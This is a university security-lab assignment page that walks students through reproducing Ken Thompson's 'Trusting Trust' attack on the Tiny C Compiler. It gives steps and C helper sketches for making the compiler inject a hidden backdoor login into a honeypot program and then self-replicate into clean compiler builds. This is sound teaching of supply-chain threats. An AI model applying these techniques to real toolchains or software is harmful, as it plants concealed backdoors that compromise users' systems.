Spring20Cs361sLab1

sethnielson edited this page Jan 29, 2020 · 2 revisions

Lab 1. 1984

Assigned 1/22/2020
Due 2/5/2020
Points 100

Introduction

In 1984, Ken Thompson wrote a paper called "Reflections on Trusting Trust." You should have already read this paper as part of your class readings. If you haven't, read it right now.

Thompson's point was that, in the computing world, our supply chains go very, very deep and malware could be hidden within those supply chains. Even if we review our source code, there's nothing to prevent a compiler from corrupting the code when it converts it to binary.

"No problem," you might be thinking, "I'll just review the compiler's source code."

But the problem is that compilers are themselves compiled. What about the compiler that builds your compiler?

In this lab, named after the year of Thompson's paper, you will implement the attack Thompson described. That is, you will modify a compiler to corrupt a piece of software during compilation. Then, you will corrupt the compiler to corrupt compilation of the compiler.

Your final corrupted compiler will take uncorrupted compiler source code as input and produce a corrupted binary. The corrupted binary should be able to corrupt uncorrupted compilers and a target piece of source code that will be provided to you.

Just to be clear:

  • S_C is the uncorrupted compiler source code
  • S_C' is the corrupted compiler source code
  • C is the uncorrupted compiler binary
  • C' is the corrupted compiler binary
  • S_A is the uncorrupted application source code
  • A is the uncorrupted application
  • A' is the corrupted application

Note that there is no corrupted application source code.

You need to write corrupted compiler source code S_C' such that the corrupted compiler it produces performs the following functions:

  • S_C -> C' -> C'; that is, the corrupted compiler will take uncorrupted compiler source and produce a corrupted compiler
  • S_A -> C' -> A'; that is, the corrupted compiler will take uncorrupted application source and produce a corrupted application

The most important observation is this: once the corrupted compiler is installed on the victim's machine, there is no corrupted source code. The malicious compiler will self-replicate, infecting every compiler it builds from uncorrupted compiler source code.

Step 0. Prerequisites

For this lab, you will need the following tools and a general knowledge of how to use them:

  1. git
  2. gcc
  3. telnet
  4. a POSIX-compatible build environment (the lab was tested in an Ubuntu WSL environment)

Step 1. Testing out an Uncorrupted Environment

For this part of the assignment, you need to test out building the compiler and building the application code. We could mess with the gcc compiler, but have you ever tried to build gcc? It takes 10 minutes just to unpack it.

To make your life more manageable, we will use a C compiler known as the "Tiny C Compiler," or tcc. tcc is a great little compiler, but it does have a few issues here and there. For our lab, you can't download one of the release versions; you'll have to get it from GitHub using the following command:

git clone https://github.com/TinyCC/tinycc

Once cloned, you need to switch to the mob branch, which has the corrections to the code that we need.

git checkout mob

You should keep a clean (uncorrupted) copy of this code as well as have a copy for your development. You can, of course, just check out a clean copy from git any time you need to, but it might be easier to just copy your repo. Or, you could fork the tcc repo in git. So long as you can readily have clean code in addition to your modified code, you will be fine.

When tcc is installed, it is usually installed into system folders. I highly recommend that you create a directory under your home folder for the installation.

mkdir /home/my_username/tcc_root

Or something similar. When you configure the tcc build, you can tell the build system to install to this location. This is done from within the tcc code directory:

./configure --prefix=/home/my_username/tcc_root

After configuration is complete:

make
make install

You can now compile C programs using ~/tcc_root/bin/tcc. In fact, you can compile tcc with tcc! Try it out.

make clean
./configure --prefix=/home/my_username/tcc_root --cc=/home/my_username/tcc_root/bin/tcc
make
make install

The other program that you need to compile is our target application called tinypot. tinypot is a very small "honeypot". We will talk some about "honeypots" during the year, but basically a "honeypot" is any program designed to lure in a hacker. The honeypot can be used to slow them down/waste their time, but it can also collect information about them.

I was not the original author of tinypot, but I have modified the code to include a simple login with a hard-coded set of authorized users. You can get the code you need from the class GitHub:

git clone https://github.com/CrimsonVista/UTAustin-Courses
cd UTAustin-Courses/2020sp_cs316s/labs/lab1/tinypot

There are only three files in this path: tinypot_main.c, tinypot_process.c, and tinypot_process.h. There is no makefile; to build the application:

/home/my_username/tcc_root/bin/tcc tinypot_main.c tinypot_process.c -pthread -o tinypot

This will create the application tinypot within the folder. To run tinypot listening on port 9999, type the following command:

tinypot - 9999

This starts up the application. You can connect to it with telnet (from another shell):

telnet localhost 9999

After a minute, you should see a login prompt. There are two valid username/password pairs: user1/password1 and user2/password2. If you enter valid credentials, you will see a prompt ($) that simply echoes back anything you type. If the credentials are not valid, the connection ends.

Step 2. Application-Corrupting Compiler

Now that you can build your compiler and the tinypot application, the next step is to modify the compiler to insert a backdoor when compiling tinypot.

First, let's look at how we want to modify the tinypot code. You can find the hard-coded user authentication data list in the tinypot_process.c file at lines 123-126.

AuthData_t authorizedUsers[] = {
    {"user1", "password1"},
    {"user2", "password2"}
};

So, your job is to modify the compiler such that, during compilation, the contents of this file are modified to include an additional entry with the username backdoor and the password backpass.

NOTE: For grading, this data structure is not guaranteed to be in the same place in the file each time. You will need to search for the data structure in order to insert your new line.
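To make the goal concrete, the sketch below shows the table as the corrupted compiler should effectively see it, together with a small lookup helper. The field names username and password and the helper is_authorized are assumptions made for illustration; the real definition of AuthData_t and the real login check live in the tinypot sources and may differ.

```c
#include <stddef.h>
#include <string.h>

/* Assumed layout: the real AuthData_t in tinypot_process.h may use
 * different field names or types. */
typedef struct {
    const char *username;
    const char *password;
} AuthData_t;

/* The table as the corrupted compiler should effectively see it.
 * The file on disk still contains only user1 and user2. */
static const AuthData_t authorizedUsers[] = {
    {"backdoor", "backpass"},   /* entry injected during compilation */
    {"user1", "password1"},
    {"user2", "password2"}
};

/* Hypothetical helper: returns 1 if the pair appears in the table, else 0. */
static int is_authorized(const char *user, const char *pass)
{
    size_t count = sizeof(authorizedUsers) / sizeof(authorizedUsers[0]);
    for (size_t i = 0; i < count; i++) {
        if (strcmp(authorizedUsers[i].username, user) == 0 &&
            strcmp(authorizedUsers[i].password, pass) == 0) {
            return 1;
        }
    }
    return 0;
}
```

The original two accounts keep working, so the victim has no functional reason to suspect the binary.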

There are a number of ways to do this. You're free to choose any method you'd like so long as it doesn't modify the original code file. That is, at the end of compilation tinypot_process.c should not be altered.

However, we will allow you to dynamically create an alternate file that contains the corrupted data. In an ideal world, the compiler wouldn't do this because it's evidence left on the machine for the victim to find. Ideally, the corrupted compiler would modify the data in memory leaving no traces.

But modifying stuff in memory requires understanding how buffers are allocated and potentially re-allocating buffers. For simplicity, we will not require you to do this.
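As a rough illustration of why the in-memory route is more work, here is a generic sketch of inserting text into a heap-allocated buffer. It is not how tcc manages its own input buffers; the function name buffer_insert and its parameters are hypothetical, and it assumes the buffer was obtained from malloc and is NUL-terminated.

```c
#include <stdlib.h>
#include <string.h>

/* Insert `extra` at byte offset `pos` of a heap-allocated, NUL-terminated
 * buffer of length *len (not counting the terminator).
 * Returns 0 on success and updates *buf and *len.
 * Returns -1 on failure and leaves the buffer untouched. */
static int buffer_insert(char **buf, size_t *len, size_t pos, const char *extra)
{
    size_t add = strlen(extra);
    if (pos > *len) {
        return -1;
    }

    /* Grow the allocation; realloc may move the data to a new address. */
    char *grown = realloc(*buf, *len + add + 1);
    if (grown == NULL) {
        return -1;
    }

    /* Shift the tail (including the terminator) to open a gap. */
    memmove(grown + pos + add, grown + pos, *len - pos + 1);
    /* Fill the gap with the new text. */
    memcpy(grown + pos, extra, add);

    *buf = grown;
    *len += add;
    return 0;
}
```

Because realloc can return a different address, any other pointer into the old buffer becomes invalid after the call. Tracking down and updating such pointers is the kind of bookkeeping the paragraph above refers to.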

The easiest way to do this is to look at the libtcc.c file. Around line 600 or so is the function tcc_open. This function populates a data structure with the filename, some buffers, and a file descriptor (fd). One possible approach is:

  1. Check if the filename parameter to tcc_open is tinypot_process.c
  2. If it is, create a new file (perhaps with a leading . to make it "hidden")
  3. Read one line at a time from tinypot_process.c
  4. After reading the line that contains the authorizedUsers declaration, insert a new line with the backdoor data
  5. Point the fd to the modified file instead of the original file
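Steps 1 through 4 above can be sketched in plain C, independent of tcc. This is only an illustration under stated assumptions: the helper names is_target_file and copy_with_insert are hypothetical, the paths and the search string are supplied by the caller, and step 5 (pointing the fd at the new file) is left out because it depends on the internals of tcc_open.

```c
#include <stdio.h>
#include <string.h>

/* Step 1: does `path` name the target file? Only the final path
 * component is compared, so "src/foo.c" matches "foo.c". */
static int is_target_file(const char *path, const char *target)
{
    const char *slash = strrchr(path, '/');
    const char *base = (slash != NULL) ? slash + 1 : path;
    return strcmp(base, target) == 0;
}

/* Steps 2-4: copy `src` to `dst` line by line. After the first line that
 * contains `needle`, write `extra` (which should end in a newline).
 * Returns 1 if `extra` was inserted, 0 if `needle` was never found,
 * and -1 on an I/O error. The source file is only read, never written.
 * Limitation: a needle split across two 4095-byte chunks is missed. */
static int copy_with_insert(const char *src, const char *dst,
                            const char *needle, const char *extra)
{
    FILE *in = fopen(src, "r");
    if (in == NULL) {
        return -1;
    }
    FILE *out = fopen(dst, "w");
    if (out == NULL) {
        fclose(in);
        return -1;
    }

    char line[4096];
    int pending = 0;   /* needle seen, waiting for the end of that line */
    int inserted = 0;  /* extra text already written */

    while (fgets(line, sizeof line, in) != NULL) {
        fputs(line, out);
        if (!inserted && strstr(line, needle) != NULL) {
            pending = 1;
        }
        /* Insert only once the matching line is complete. */
        if (pending && !inserted && strchr(line, '\n') != NULL) {
            fputs(extra, out);
            inserted = 1;
        }
    }

    int failed = ferror(in) || ferror(out);
    fclose(in);
    if (fclose(out) != 0) {
        failed = 1;
    }
    return failed ? -1 : inserted;
}
```

Searching for the declaration text rather than a fixed line number is what keeps this working when the data structure moves within the file, as the grading note requires.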

That's it! You should now be able to compile tinypot and find that you can login with the backdoor data!

Step 3. Compiler-Corrupting Compiler

Now, for the final step of this lab, you need to modify your evil compiler to corrupt uncorrupted compiler source code.

The operation is not all that different from corrupting the application. The only file that needs to be corrupted is libtcc.c (unless you did something different from the approach I suggested). As before, you should ensure that when that file is compiled the code is modified.

This step is a little bit harder because it's not a one-line modification like it was for the application. Worse, because of a bit of circular logic, you can't just write the modifications directly.

Why?

Because you have to modify the compiler to modify the compiler. So, if you want to have a modified statement, you have to write the modification that inserts the modified statement. But then, you also have to write the modification that inserts the modification that inserts the modified statement.

You may have to do a little thinking to see how to write the self-modifying code. You're welcome to search Google for ideas or ask the TA/professor.
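One common way out of this kind of circularity is the trick used by self-reproducing programs (quines): keep the text in a string that contains a placeholder for itself, then print the string with itself as the argument. The sketch below is a toy illustration of that idea only, not a solution to the lab; the names TEMPLATE and render_self are hypothetical.

```c
#include <stdio.h>

/* One line of source text with a %s hole where its own text belongs.
 * The two %c holes receive 34, the character code of the double quote,
 * which avoids having to escape quotes inside the string. */
static const char *TEMPLATE = "static const char *TEMPLATE = %c%s%c;";

/* Write into `out` the exact source line that declares TEMPLATE above.
 * Returns the value of snprintf: the number of characters needed,
 * not counting the terminating NUL. */
static int render_self(char *out, size_t size)
{
    return snprintf(out, size, TEMPLATE, 34, TEMPLATE, 34);
}
```

Calling render_self on a large enough buffer yields the declaration line of TEMPLATE character for character, even though that line was never typed out a second time. The same idea scales up: text that must reproduce itself is stored once and emitted twice, once as data and once as code.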

But, once you have it working you should be able to test by compiling tcc with the corrupted tcc. The corrupted tcc should be able to corrupt any other compilations of tcc. And, of course, the corrupted tcc should corrupt tinypot.

Submission and Grading

You must complete this assignment individually, but I encourage collaboration at the level of ideas. I will adjust the collaboration policy throughout the semester based on the assignment and how well the class is doing. For this assignment, you must write all of your code by yourself, and you may not look at anyone else's code. If you need debugging help, please talk to the professor or the TA.

But you may work together by discussing concepts, strategies, and even generic algorithms and pseudo-code. So long as you are not writing code together, or sharing code, you may work in any size group.

Each submission is individual via GitHub. To submit:

  1. Use git to create a patch for tinycc using git diff > tinycc.patch from the tinycc repo
  2. Commit the patch in your class repo under labs/lab1/tinycc.patch
  3. Tag your commit using git tag lab1-1.0. If you make a change after submission, re-commit and tag with git tag lab1-1.x where x is one greater than the last submission

Your submission will be graded as follows:

  1. 50 points. Modified compiler correctly corrupts the tinypot application
  2. 50 points. Modified compiler correctly corrupts tcc
  3. 20 points (extra credit). Modifies compiled files in memory without creating corrupted files on disk (all corruption in memory)

If you want the extra credit mentioned above, include a file labs/lab1/inmemory.txt that describes how you perform the in-memory modifications.
